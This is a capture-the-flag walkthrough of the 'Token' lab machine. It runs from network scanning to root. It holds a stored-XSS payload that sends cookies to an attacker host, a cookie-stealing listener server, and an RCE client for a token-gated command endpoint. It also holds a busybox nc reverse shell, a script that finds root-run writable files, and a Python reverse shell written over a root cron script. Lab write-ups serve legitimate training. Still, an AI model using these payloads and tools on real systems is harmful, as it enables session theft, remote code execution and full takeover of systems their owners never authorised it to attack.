Token

Target notes

QQ group: 660930334

I. Host discovery

┌──(root㉿kali)-[/miao/maze-sec/token]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-25 09:01 CST
Nmap scan report for 192.168.2.1
Host is up (0.00043s latency).
MAC Address: 0A:00:27:00:00:0A (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00034s latency).
MAC Address: 08:00:27:C7:7C:7C (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.63
Host is up (0.00094s latency).
MAC Address: 08:00:27:5C:90:A4 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.04 seconds

Target IP: 192.168.2.63

II. Port scanning

1. Full port scan

┌──(root㉿kali)-[/miao/maze-sec/token]
└─# nmap --min-rate 10000 -p- 192.168.2.63
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-25 09:01 CST
Nmap scan report for 192.168.2.63
Host is up (0.00034s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
5000/tcp open upnp
MAC Address: 08:00:27:5C:90:A4 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 3.61 seconds

Open ports: 22, 80, 5000

2. Service and version scan

┌──(root㉿kali)-[/miao/maze-sec/token]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80,5000 192.168.2.63
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-25 09:02 CST
Nmap scan report for 192.168.2.63
Host is up (0.0011s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.62 (Debian)
| http-title: \xE7\xAE\xA1\xE7\x90\x86\xE5\x91\x98\xE7\x99\xBB\xE5\xBD\x95
|_Requested resource was login.php
5000/tcp open upnp?
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 404 NOT FOUND
| Server: Werkzeug/3.1.3 Python/3.9.2
| Date: Fri, 25 Jul 2025 01:02:23 GMT
| Content-Type: text/html; charset=utf-8
| Content-Length: 207
| Connection: close
| <!doctype html>
| <html lang=en>
| <title>404 Not Found</title>
| <h1>Not Found</h1>
| <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
| HTTPOptions:
| HTTP/1.1 404 NOT FOUND
| Server: Werkzeug/3.1.3 Python/3.9.2
| Date: Fri, 25 Jul 2025 01:02:38 GMT
| Content-Type: text/html; charset=utf-8
| Content-Length: 207
| Connection: close
| <!doctype html>
| <html lang=en>
| <title>404 Not Found</title>
| <h1>Not Found</h1>
| <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
| Help:
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
| "http://www.w3.org/TR/html4/strict.dtd">
| <html>
| <head>
| <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
| <title>Error response</title>
| </head>
| <body>
| <h1>Error response</h1>
| <p>Error code: 400</p>
| <p>Message: Bad request syntax ('HELP').</p>
| <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
| </body>
| </html>
| RTSPRequest:
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
| "http://www.w3.org/TR/html4/strict.dtd">
| <html>
| <head>
| <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
| <title>Error response</title>
| </head>
| <body>
| <h1>Error response</h1>
| <p>Error code: 400</p>
| <p>Message: Bad request version ('RTSP/1.0').</p>
| <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
| </body>
|_ </html>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?
....
MAC Address: 08:00:27:5C:90:A4 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 94.98 seconds

III. Web exploitation

1. Port 80

Port 80 serves a login page: / redirects to login.php, and the escaped http-title in the nmap output decodes to 管理员登录 ("Administrator login"). Port 5000 is not UPnP as nmap guessed; the banner shows a Werkzeug/3.1.3 Python/3.9.2 application, i.e. Flask.

1) Directory brute force

┌──(root㉿kali)-[/miao/maze-sec/token]
└─# gobuster dir -u http://192.168.2.63 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html,bak,md,db,js
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.2.63
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: bak,md,db,js,php,txt,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 277]
/index.php (Status: 302) [Size: 0] [--> login.php]
/login.php (Status: 200) [Size: 3484]
/.html (Status: 403) [Size: 277]
/feedback.php (Status: 200) [Size: 5008]
/messages.txt (Status: 200) [Size: 0]
/logout.php (Status: 302) [Size: 0] [--> login.php]
/dashboard.php (Status: 302) [Size: 0] [--> login.php]
/.html (Status: 403) [Size: 277]
/.php (Status: 403) [Size: 277]
/server-status (Status: 403) [Size: 277]
Progress: 1764480 / 1764488 (100.00%)
===============================================================
Finished
===============================================================

Two paths stand out: feedback.php and messages.txt. feedback.php is a message (feedback) form and messages.txt is the file the submitted messages are stored in (it is empty at this point, size 0).

2) XSS

The HTML source of feedback.php contains a comment hinting that the form is vulnerable to XSS.

Since the messages are stored and later viewed, a stored XSS payload that sends the viewer's cookies to our machine (192.168.2.4) should capture flask_token:

<script>document.location='http://192.168.2.4/cookie_catcher.php?cookie='+document.cookie</script>

Once the stored message is rendered by a browser holding the admin session, the payload fires and the listener receives the cookie. Its value is a complete authorization header, and it is exposed to JavaScript only because the cookie was set without the HttpOnly flag (nmap's http-cookie-flags script had already flagged the same problem for PHPSESSID):

flask_token=Authorization: Bearer ADMIN_T0K3N_Flask_Dashazi
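The payload points at a cookie_catcher.php on the attacker host that the write-up never shows. The following is an added stand-in for it in Python (my code, not the author's; the listener port and the 204 reply are my choices): it logs every hit and pulls the bearer token out of the flask_token value so it can be replayed against port 5000.

```python
# Added example, not from the original write-up: a Python stand-in for the
# cookie_catcher.php the XSS payload calls. It logs every hit and recovers the
# bearer token from the exfiltrated flask_token cookie so it can be replayed.
import re
import sys
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlsplit

BEARER_RE = re.compile(r"Bearer\s+(\S+)")


def parse_cookie_header(cookie_str):
    """Split a document.cookie string into {name: value}.

    Done by hand because the unquoted-value grammar of
    http.cookies.SimpleCookie does not allow the spaces inside this
    cookie's value ('Authorization: Bearer ...')."""
    jar = {}
    for part in cookie_str.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            jar[name.strip()] = value.strip()
    return jar


def extract_bearer(query_string, cookie_name="flask_token"):
    """Return the bearer token carried in ?cookie=..., or None if absent."""
    for raw in parse_qs(query_string).get("cookie", []):
        value = parse_cookie_header(raw).get(cookie_name)
        if value:
            m = BEARER_RE.search(value)
            if m:
                return m.group(1)
    return None


class CookieCatcher(BaseHTTPRequestHandler):
    """Accepts any path (cookie_catcher.php included) and logs the query."""

    def do_GET(self):
        query = urlsplit(self.path).query
        token = extract_bearer(query)
        print(f"[+] {self.client_address[0]} {query!r} bearer={token}", file=sys.stderr)
        # 204 makes the victim's browser stay on its current page instead of
        # rendering a blank one, which is a little less conspicuous.
        self.send_response(204)
        self.end_headers()

    def log_message(self, *args):
        pass  # the line printed in do_GET is the only log we want


if __name__ == "__main__":
    # Assumed usage: python3 catcher.py 80  (port 80 matches the payload's URL)
    port = int(sys.argv[1]) if len(sys.argv) > 1 else 80
    HTTPServer(("0.0.0.0", port), CookieCatcher).serve_forever()
```

Run it as root on the attacker box (the payload uses the default port 80), submit the payload through feedback.php, and the recovered token is printed on stderr when the victim's browser fetches the URL.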

2. Port 5000

1) Directory brute force

┌──(root㉿kali)-[/miao/maze-sec/token]
└─# dirsearch -u "http://192.168.2.63:5000"
Target: http://192.168.2.63:5000/

[14:50:56] Starting:
[14:51:12] 302 - 199B - /admin -> /login
[14:51:32] 401 - 25B - /cmd
[14:51:43] 200 - 44B - /flag
[14:51:54] 200 - 323B - /login

Task Completed

/cmd requires authentication:

┌──(root㉿kali)-[/miao/maze-sec/token]
└─# curl http://192.168.2.63:5000/cmd
{"error":"Unauthorized"}

2) Command execution

Sending the stolen token in an Authorization: Bearer header, /cmd runs whatever is passed in the cmd parameter and returns its output as JSON:

┌──(root㉿kali)-[/miao/maze-sec/token]
└─# curl "http://192.168.2.63:5000/cmd?cmd=id" -H "Authorization: Bearer ADMIN_T0K3N_Flask_Dashazi"
{"output":"uid=33(www-data) gid=33(www-data) groups=33(www-data)\n","status":"success"}
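A small client for the token-gated /cmd endpoint, added here as an example and not part of the original write-up, so the RCE can be driven as a pseudo-shell instead of hand-encoding curl lines. The target URL, the token and the two JSON response shapes ({"output":...,"status":"success"} and {"error":"Unauthorized"}) are the ones shown above; the rest is my own.

```python
# Added example, not from the original write-up: a client for the token-gated
# /cmd endpoint, usable as a pseudo-shell. Target, token and the two JSON
# response shapes are taken from the write-up; everything else is assumed.
import json
import sys
import urllib.error
import urllib.request
from urllib.parse import quote

TARGET = "http://192.168.2.63:5000"
TOKEN = "ADMIN_T0K3N_Flask_Dashazi"


class Unauthorized(Exception):
    """Raised when the app answers with its {"error": "Unauthorized"} body."""


def build_cmd_url(base, cmd):
    """Percent-encode the command into ?cmd= (spaces become %20, as in curl)."""
    return f"{base.rstrip('/')}/cmd?cmd={quote(cmd)}"


def parse_cmd_response(body):
    """Map the JSON body to the command output, or raise on the error shape."""
    data = json.loads(body)
    if "error" in data:
        raise Unauthorized(data["error"])
    if data.get("status") != "success":
        raise RuntimeError(f"unexpected reply: {data!r}")
    return data.get("output", "")


def run_cmd(cmd, base=TARGET, token=TOKEN, timeout=10):
    """Execute one command on the target and return its stdout."""
    req = urllib.request.Request(
        build_cmd_url(base, cmd),
        headers={"Authorization": f"Bearer {token}"},
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return parse_cmd_response(resp.read())
    except urllib.error.HTTPError as err:
        # A 401 still carries a JSON body; hand it to the same parser.
        return parse_cmd_response(err.read())


if __name__ == "__main__":
    # Pseudo-shell: each line read from stdin is sent as one command.
    for line in sys.stdin:
        cmd = line.strip()
        if cmd:
            try:
                sys.stdout.write(run_cmd(cmd))
                sys.stdout.flush()
            except Unauthorized as err:
                print(f"[!] {err}", file=sys.stderr)
```

Each command is a separate HTTP request, so there is no working directory or environment carried between lines; the reverse shell in the next section is the better tool once you have confirmed execution.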

IV. Getting a shell as www-data

Reverse shell

Use the command-execution endpoint to spawn a reverse shell with busybox nc (the command is URL-encoded in the cmd parameter):

┌──(root㉿kali)-[/miao/maze-sec/token]
└─# curl "http://192.168.2.63:5000/cmd?cmd=busybox%20nc%20192.168.2.4%204444%20-e%20/bin/bash" -H "Authorization: Bearer ADMIN_T0K3N_Flask_Dashazi"

The listener receives a shell running as www-data:

┌──(root㉿kali)-[~]
└─# nc -lvnp 4444
listening on [any] 4444 ...
id
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.63] 54420
uid=33(www-data) gid=33(www-data) groups=33(www-data)

USER FLAG

www-data@Token:/home/catalytic$ cat user.txt 
flag{user-caaea73c2af7f9b2391cc15f398b0e74}

V. Privilege escalation

Look for processes running as root:

www-data@Token:/home/catalytic$ ps aux | grep root
....
root 687534 0.0 0.0 2472 512 ? Ss 03:27 0:00 /bin/sh -c /usr/bin/python3 /var/www/html/check_messages_cron/check_messages.py
root 687538 3.8 1.1 107264 24088 ? Sl 03:27 0:00 /usr/bin/python3 /var/www/html/check_messages_cron/check_messages.py
....
www-data 689354 0.0 0.0 6176 632 pts/0 S+ 03:27 0:00 grep root

Root runs /var/www/html/check_messages_cron/check_messages.py through /bin/sh -c, i.e. from a cron job. The script itself is owned, and therefore writable, by www-data:

www-data@Token:~/html$ ls -la check_messages_cron/check_messages.py 
-rwxr-xr-x 1 www-data www-data 1842 Jul 22 02:03 check_messages_cron/check_messages.py
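The check just done by hand (a root process executing a file that our user owns) generalises to any file a root process runs through an interpreter and that the current user can write. The following added example (my code, not from the write-up) automates it by parsing ps aux output; SAMPLE_PS is constructed from the rows shown above, and the isfile/access hooks are there so the logic can be tested without a live target.

```python
# Added example, not from the original write-up: automate the manual
# "ps aux | grep root" + "ls -la" check. It lists files that a root-owned
# process is executing through an interpreter and that the current user can
# overwrite. SAMPLE_PS is constructed from the ps output shown above.
import os
import re
import shlex

# Interpreters whose absolute-path arguments are scripts (python3, perl5.36, ...).
INTERPRETER_RE = re.compile(r"(python|perl|ruby|php)[\d.]*|sh|bash|dash")

SAMPLE_PS = """\
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.1 165000 10000 ? Ss 03:00 0:01 /sbin/init
root 687534 0.0 0.0 2472 512 ? Ss 03:27 0:00 /bin/sh -c /usr/bin/python3 /var/www/html/check_messages_cron/check_messages.py
root 687538 3.8 1.1 107264 24088 ? Sl 03:27 0:00 /usr/bin/python3 /var/www/html/check_messages_cron/check_messages.py
www-data 689354 0.0 0.0 6176 632 pts/0 S+ 03:27 0:00 grep root
""".splitlines()


def script_args(argv):
    """Yield absolute paths passed to an interpreter, following `sh -c ...`
    (the wrapper cron uses) down to the real script."""
    if not argv or not INTERPRETER_RE.fullmatch(os.path.basename(argv[0])):
        return
    rest = argv[1:]
    if len(rest) >= 2 and rest[0] == "-c":
        inner = rest[1:]
        # ps prints argv joined by spaces, so the -c string arrives already
        # split; a genuine single "-c 'cmd line'" argument is split here.
        if len(inner) == 1:
            inner = shlex.split(inner[0])
        yield from script_args(inner)
        return
    for arg in rest:
        if arg.startswith("/"):
            yield arg


def parse_ps_line(line):
    """Return (user, argv) for one `ps aux` row; None for the header."""
    cols = line.split(None, 10)
    if len(cols) < 11 or cols[0] == "USER":
        return None
    try:
        argv = shlex.split(cols[10])
    except ValueError:  # unbalanced quotes in an odd command line
        argv = cols[10].split()
    return cols[0], argv


def writable_root_scripts(ps_lines, isfile=os.path.isfile, access=os.access):
    """Scripts run by root that the current user can write, in first-seen order.
    isfile/access are injectable so the logic can be tested without a target."""
    hits = []
    for line in ps_lines:
        parsed = parse_ps_line(line)
        if not parsed or parsed[0] != "root":
            continue
        for path in script_args(parsed[1]):
            if path not in hits and isfile(path) and access(path, os.W_OK):
                hits.append(path)
    return hits


if __name__ == "__main__":
    import subprocess
    ps = subprocess.run(["ps", "aux"], capture_output=True, text=True, check=True)
    for path in writable_root_scripts(ps.stdout.splitlines()):
        print(f"[!] root runs {path} and it is writable by uid {os.getuid()}")
```

Run it from the www-data shell; it only sees processes alive at that moment, so a cron job that runs briefly may need a few attempts or a look at the crontab files themselves.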

Overwrite check_messages.py with a Python reverse shell; whatever root executes from a file we can write runs with root's privileges:

echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.2.4",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' > /var/www/html/check_messages_cron/check_messages.py

Start a listener and wait for the next cron run:

┌──(root㉿kali)-[~]
└─# nc -lvnp 4444
listening on [any] 4444 ...
id
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.63] 60762
bash: cannot set terminal process group (1002175): Inappropriate ioctl for device
bash: no job control in this shell
root@Token:~# id
uid=0(root) gid=0(root) groups=0(root)
root@Token:~# id
id
uid=0(root) gid=0(root) groups=0(root)

ROOT FLAG

root@Token:~# cat root.txt
flag{root-d404401c8c6495b206fc35c95e55a6d5}

Token
http://miao-sec.github.io/Maze-sec/Token/
Author: Miao
Published: 28 July 2025
License: BY-MIAO